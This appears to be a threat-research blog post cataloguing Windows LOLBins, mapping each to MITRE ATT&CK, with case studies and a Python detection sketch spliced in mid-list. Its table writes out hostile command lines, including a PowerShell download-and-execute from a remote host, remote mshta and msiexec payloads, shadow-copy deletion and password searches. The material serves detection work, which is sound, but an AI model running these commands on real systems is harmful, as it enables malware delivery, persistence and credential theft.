# LOLBins Are No Laughing Matter: How Attackers Operate Quietly

**uptycs.com/blog/lolbins-are-no-laughing-matter**

_Original research by Pritam Salunkhe and Shilpesh Trivedi_

The Uptycs Threat Research team has observed several malicious binaries in our threat intelligence systems using LOLBins in their attack kill chain. LOLBins (short for Living Off the Land Binaries) are non-malicious native operating system or well-known software binaries that are used to perform malicious activities and evade cyber defenses. The Uptycs Threat Research team has created over 300 rules covering the different techniques used by LOLBins in the MITRE ATT&CK framework.

In this post, we take a look at the LOLBins used by attackers and how you can use Uptycs EDR detection capabilities to find out whether they have been used in your environment.

## LOLBins and Uptycs EDR coverage

Living off the Land binaries abuse trusted utilities to achieve malicious objectives. Threat actors mostly use them to stay under the radar and continue their malicious activity undetected. On Windows, most malware families leverage LOLBins across a wide variety of phases of the attack kill chain.

Uptycs EDR has robust coverage for the [LOLBAS (Living off the Land Binaries and Scripts)](https://lolbas-project.github.io/) techniques seen in the wild. Using the data from our customer telemetry and threat intelligence systems, the Uptycs Threat Research team has created over 300 rules covering 8 different tactics used by LOLBins in the MITRE ATT&CK framework. The distribution of these rules across techniques is shown below (see Figure 1).

## April - July 2021 LOLBins & MITRE ATT&CK Mapping

Using the data from our in-house threat intelligence systems and customer telemetry, we created a monitoring dashboard of all observed LOLBins. From April 2021 through July 2021, we observed 26 binaries mostly used as LOLBins by several malware groups.
The prevalence of the malicious binaries using these LOLBins is shown below (see Figure 2). These LOLBins were identified as being used exclusively in the Defense Evasion and Execution phases of the MITRE ATT&CK framework. The distribution of the different ATT&CK tactics used by attackers leveraging Windows utilities from April 2021 through July 2021 is shown below (see Figure 3).

The table below describes these 26 LOLBins, along with their MITRE ATT&CK mapping and a command line example.

| LOLBin | MITRE ID | MITRE Tactic | Description | Command Line Example |
| --- | --- | --- | --- | --- |
| regsvr32.exe | T1218 | Defense Evasion | Adversaries may use regsvr32.exe to execute malicious DLLs. | `regsvr32 ..\Kro.fis2` |
| rundll32.exe | T1218 | Defense Evasion | Adversaries may use rundll32.exe to load malicious DLLs. | `rundll32 ..\Kiod.hod2,DllRegisterServer` |
| EQNEDT32.exe | T1203 | Execution | Adversaries may exploit the CVE-2017-11882 vulnerability in eqnedt32 for remote code execution on the target system. | `EQNEDT32.EXE -Embedding` |
| cmd.exe | T0159 | Execution | Adversaries may use cmd.exe with the /c or /k parameter to launch other Windows utilities for further attack steps. | `cmd.exe /c reg add HKCU\ /d 1q1a1z.bat /f` |
| powershell.exe | T1059 | Execution | Adversaries may use powershell.exe to download payloads or execute malicious PowerShell-based tools or scripts. | `PowerShell -c (New-Object System.Net.WebClient).DownloadFile('http://w2a0zj.pw/wnxtp2.exe', '.\morose.exe'); Start('.\morose.exe')` |
| attrib.exe | T1564 | Defense Evasion | Adversaries may use attrib.exe to hide files for defense evasion on the target system. | `"C:\Windows\system32\attrib.exe" +h C:\Users\admin\Pictures\*.* /s` |
| wmic | T1047 | Execution | Adversaries may use wmic for execution or for lateral movement in the target network. | `wmic process call create "rundll32.exe C:\ProgramData\lLjlxNACJC.dll CPGenRandom"` |
| schtasks.exe | T1053 | Privilege Escalation | Adversaries may abuse the schtasks.exe utility to initiate or repeat execution of malicious code. | `schtasks /run /tn \Microsoft\Windows\DiskCleanup\SilentCleanup /I` |
| netsh | T1546 | Persistence | Adversaries may use netsh to gain persistence by executing a helper DLL. | `netsh add helper C:/Users/Public/settingsync.dll` |
| Chrome.exe | T1105 | Command and Control | Adversaries can spawn chrome.exe to download malicious files onto the target system. | `cmd /k start chrome https://onedrive.live.com/embed?cid=880174EF88F116A9` |
| vssadmin.exe | T1490 | Impact | Adversaries may use vssadmin.exe to delete volume shadow copies to prevent system recovery. | `vssadmin.exe delete shadows /all /quiet` |
| net.exe | T1562 | Defense Evasion | Adversaries can use net.exe to stop services on the target system. | `C:\Windows\system32\net.exe stop "samss" /y` |
| mshta.exe | T1218 | Defense Evasion | Adversaries may abuse mshta.exe to proxy execution of malicious .hta files and JavaScript or VBScript. | `mshta https://median-researchers.000webhostapp.com/cmd.hta` |
| cscript.exe | T1059 | Execution | Adversaries may use cscript.exe to execute VB scripts. | `"C:\Windows\System32\cscript.exe" //NOLOGO ".\XMCO_Snap_Windows_v2.50.vbs"` |
| curl.exe | T1105 | Command and Control | Adversaries may use curl.exe to download tools and payloads from remote systems onto compromised systems. | `curl.exe -o C:\ctf\file.exe https://dforest.watch.impress.co.jp/library/7/7zip/11608/7z1900x64.exe` |
| certutil.exe | T1140 | Defense Evasion | Adversaries may use certutil.exe to encode/decode payloads to thwart detection and analysis. | `certutil -decode C:\ProgramData\googlelog.txt C:\ProgramData\edge.bat` |
| wscript.exe | T1059 | Execution | Adversaries may use wscript.exe to execute VBA, VBS and JS files. | `"WScript.exe" "C:\Users\user\Desktop\2.vbs"` |
| msiexec.exe | T1218 | Defense Evasion | Adversaries may use msiexec.exe to silently launch local or remote malicious MSI files. | `msiExec /i http://hotelcontinental-khenifra.com/ffp/sa6t.msi /qn` |
| csc.exe | T1027 | Defense Evasion | Adversaries may use the csc.exe tool to compile executables from downloaded C# code. | `"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cimpactsc.exe" /noconfig /fullpaths @"2vdvx0yh.cmdline"` |
| reg.exe | T1112 | Defense Evasion | Adversaries may use reg.exe to query, add or modify the Windows registry. | `REG ADD \"HKCU\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run\" /V \"Gom Player\" /t REG_SZ /F /D \"C:\\Users\\zinx\\AppData\\Local\\Gom Player.exe` |
| findstr.exe | T1552 | Credential Access | Adversaries may use findstr.exe to search for unsecured credentials stored in files on the local system. | `findstr /spin "password" *.*` |
| bitsadmin.exe | T1197 | Defense Evasion | Adversaries may abuse bitsadmin (BITS jobs) to download malicious code. | `bitsadmin.exe /transfer McbDBJxc https://jrsawesomebuilds.com/some/GHRPLA83D19D037U/doc.txt C:\ProgramData\doc.txt` |
| taskkill.exe | T1489 | Impact | Adversaries may use taskkill.exe to kill processes or stop services. | `taskkill /im explorer.exe /f` |
| whoami.exe | T1033 | Discovery | Adversaries may try to find the currently logged-in user or verify the user's privileges using whoami.exe. | `cmd.exe /c whoami.exe /PRIV > file.txt` |
| tasklist.exe | T1057 | Discovery | Adversaries may use tasklist.exe to enumerate running processes on the compromised system. | `tasklist /nh /fi "imagename eq svhost.exe` |
| verclsid.exe | T1218 | Execution | Adversaries may abuse verclsid.exe to execute malicious COM payloads. | `verclsid.exe /S /C {E88DCCE0-B7B3-11D1-A9F0-00AA0060FA31} /I {000214E6-0000-0000-C000-000000000046} /X 0x401` |

## LOLBins Observations

Based on the data we obtained from April 2021 through July 2021, we identified the following:

- Most of the LOLBin alerts we identified were triggered via decoy macro documents.
- regsvr32.exe and rundll32.exe have the highest number of counts.
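The table's mappings can be turned into a process-creation check that runs over EDR or Sysmon-style events (parent image, image, command line). The following is an added example written for this post, not Uptycs' EDR rules or any Uptycs code; the trigger patterns and the Office-parent condition are my own assumptions drawn from the table and the case studies, and the sample events are constructed.

```python
import re
from typing import NamedTuple

class ProcEvent(NamedTuple):
    parent: str    # parent image name, e.g. "winword.exe"
    image: str     # process image name, e.g. "regsvr32.exe"
    cmdline: str   # full command line as logged

OFFICE = frozenset({"winword.exe", "excel.exe", "powerpnt.exe", "eqnedt32.exe"})
SHELLS = frozenset({"cmd.exe", "powershell.exe"})

# (MITRE ID, tactic, images, command-line regex, required parents or None).
# IDs and tactics follow the table above; the trigger patterns are my own reading of it.
RULES = [
    ("T1218", "Defense Evasion", {"regsvr32.exe", "rundll32.exe", "mshta.exe"}, r".", OFFICE),
    ("T1059", "Execution", {"powershell.exe", "wscript.exe", "cscript.exe"}, r".", OFFICE),
    ("T1047", "Execution", {"wmic.exe"}, r"process\s+call\s+create", None),
    ("T1053", "Privilege Escalation", {"schtasks.exe"}, r"/run\b.*silentcleanup", None),
    ("T1546", "Persistence", {"netsh.exe"}, r"\badd\s+helper\b", None),
    ("T1490", "Impact", {"vssadmin.exe"}, r"delete\s+shadows", None),
    ("T1140", "Defense Evasion", {"certutil.exe"}, r"-(?:de|en)code\b", None),
    ("T1197", "Defense Evasion", {"bitsadmin.exe"}, r"/transfer\b.*https?://", None),
    ("T1105", "Command and Control", {"curl.exe", "chrome.exe"}, r"https?://", SHELLS | OFFICE),
    ("T1552", "Credential Access", {"findstr.exe"}, r"pass(?:word|wd)", None),
    ("T1027", "Defense Evasion", {"csc.exe"}, r"\.cmdline\b", None),
]

def match_event(ev: ProcEvent) -> list:
    """Return every (MITRE ID, tactic) pair whose rule fires on a single event."""
    hits = []
    for tid, tactic, images, pattern, parents in RULES:
        if (ev.image.lower() in images and (parents is None or ev.parent.lower() in parents)
                and re.search(pattern, ev.cmdline, re.I)):
            hits.append((tid, tactic))
    return hits

def scan(events) -> list:
    """Flatten hits over an event stream as (image, MITRE ID, tactic) triples."""
    return [(ev.image, tid, tactic) for ev in events for tid, tactic in match_event(ev)]

# Constructed sample telemetry modelled on the table's command lines, not real logs.
SAMPLE = [
    ProcEvent("excel.exe", "schtasks.exe", r"schtasks /run /tn \Microsoft\Windows\DiskCleanup\SilentCleanup /I"),
    ProcEvent("wmic.exe", "netsh.exe", "netsh add helper C:/Users/Public/settingsync.dll"),
    ProcEvent("cmd.exe", "chrome.exe", "chrome --new-window https://onedrive.live.com/embed?cid=EXAMPLE"),
    ProcEvent("explorer.exe", "rundll32.exe", "rundll32 shell32.dll,Control_RunDLL"),  # benign parent: no hit
    ProcEvent("winword.exe", "rundll32.exe", r"rundll32 ..\Kiod.hod2,DllRegisterServer"),
]
```

Rules keyed only on the image name are noisy for utilities such as rundll32 or curl; the parent-process condition is what separates the document-spawned cases described in this post from ordinary administrative use.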
regsvr32.exe and rundll32.exe were used exclusively by [Qbot and IcedID malware from the beginning of January 2021, as detailed in our previous blog](https://www.uptycs.com/blog/icedid-campaign-spotted-being-spiced-with-excel-4-macros). We have also seen a significant number of Loki and Agent Tesla malware samples exploiting a Microsoft Equation Editor (EE) vulnerability in EQNEDT32.

We will now cover interesting examples of LOLBins and their corresponding MITRE ATT&CK tactics.

## LOLBin - Chrome.exe

Tactic: Command and Control

_Hash: eae1b54ba4168e16e951fde291520078d8a5f8b98447cedf5663ae62b9069127_

Chrome is the browser most commonly used by users, even though it is not a default Windows utility. During June 2021, our threat intelligence systems detected a document, "Resume.docx", which spawned a new chrome.exe process via the command line. This activity often goes unnoticed by monitoring solutions. The document launched chrome.exe with the command line argument `--new-window` to open a new window and download the payload from onedrive.com, as shown below (see Figure 4).

## LOLBin - Schtasks.exe

Tactic: Privilege Escalation

_Hash: 6c92ed33934d5a604f57aac4ff33252720354285291791bed88b6f3f15b9631d_

Schtasks is used to create scheduled tasks that can be executed recurrently. We identified a document using schtasks for privilege escalation. The Excel document launches schtasks via the command line to run the existing task named SilentCleanup. This is done to bypass UAC and execute PowerShell commands in elevated mode, as shown below (see Figure 5).

## LOLBin - Csc.exe

Tactic: Defense Evasion

_Hash: 2048aae014930d195ac0c139c3260928bd25d840ff924fb46d25c79048a9c813_

Csc.exe is a built-in utility located in the Microsoft.NET\Framework\ folder under the Windows directory. Its main purpose is to compile C# code. Because the malicious code is not yet compiled when it arrives, adversaries may be able to bypass detection and analysis; the source can also be given a legitimate-looking document name. We identified a Word document named "contract.docm" which launches PowerShell to download the uncompiled C# code. After the download completes, csc.exe compiles that code into an executable on the fly, as shown below (see Figure 6).

## LOLBin - netsh.exe

Tactic: Persistence

_Hash: 36b891924e7259d7b517a5f16a108e63aca927da3610b1dcb4dee79a4ccd2223_

Netsh is a command-line scripting utility that allows you to display or modify the network configuration. Netsh also has an option to add helper DLLs that extend the utility's functionality. We identified an Excel document that called wmic to create a new netsh process to register the malicious DLL as a helper DLL, as shown below (see Figure 8). The path of the DLL is also written to the Windows Registry at HKLM\SOFTWARE\Microsoft\Netsh. This allows adversaries to maintain persistence, as the DLL is executed whenever netsh is launched.

## Conclusion

The Uptycs Threat Research team continues to see an increase in LOLBins used across various stages of the MITRE ATT&CK framework. As most of these utilities are also used for daily activities, they are a challenge for traditional security solutions that do not monitor process behavior. Uptycs' EDR functionality, with suspicious parent/child process relationships, correlation and threat intelligence, provides comprehensive detection and visibility to identify LOLBin malicious activity generically.

**Credits:** Thanks to our Uptycs Threat Research team member Rohit Bhagat for maintaining and enhancing the threat intelligence portal used to identify the latest LOLBins attacks.